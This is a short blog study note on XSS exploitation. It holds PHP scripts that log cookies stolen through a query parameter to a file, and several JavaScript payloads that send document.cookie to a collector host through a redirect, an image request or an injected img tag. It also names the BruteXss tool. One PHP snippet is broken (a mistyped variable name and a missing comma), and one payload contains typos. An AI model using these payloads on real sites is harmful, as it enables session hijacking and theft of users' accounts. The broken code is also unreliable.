-xss -web -学习笔记

xss利用

xss

Posted by mr_king on July 20, 2020

php获取xss获取的cookie

php

<?php
$cookie = $_GET['cookie'];
file_put_contents('cookie.txt',$cookie);

?>   



<?php
$cookie = $_GET['cookie'];
$1og= fopen("cookie.txt", "a");
fwrite($log$cookie ."\n");
fclose($log);

js:

<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script> 

1<script> document.location="http://www.test.com/cookie.asp?cookie="+document.cookie </script>
2<script> new Image().src="http:/ /www.test.com/cookie.asp?cookie="+document.cookie;</script>
3<script> document.write('<img src="http://www.test.com/cookie.asp?cookie='+document.cookie+'"width=0 height=0 border=Q/>');</script>

工具

1.BruteXss

CATALOG
    FEATURED TAGS
    -web -学习笔记 -xss -MISC -杂项 -sql注入 -PHP -ctf -命令执行 -ssti -wp -java
    FRIENDS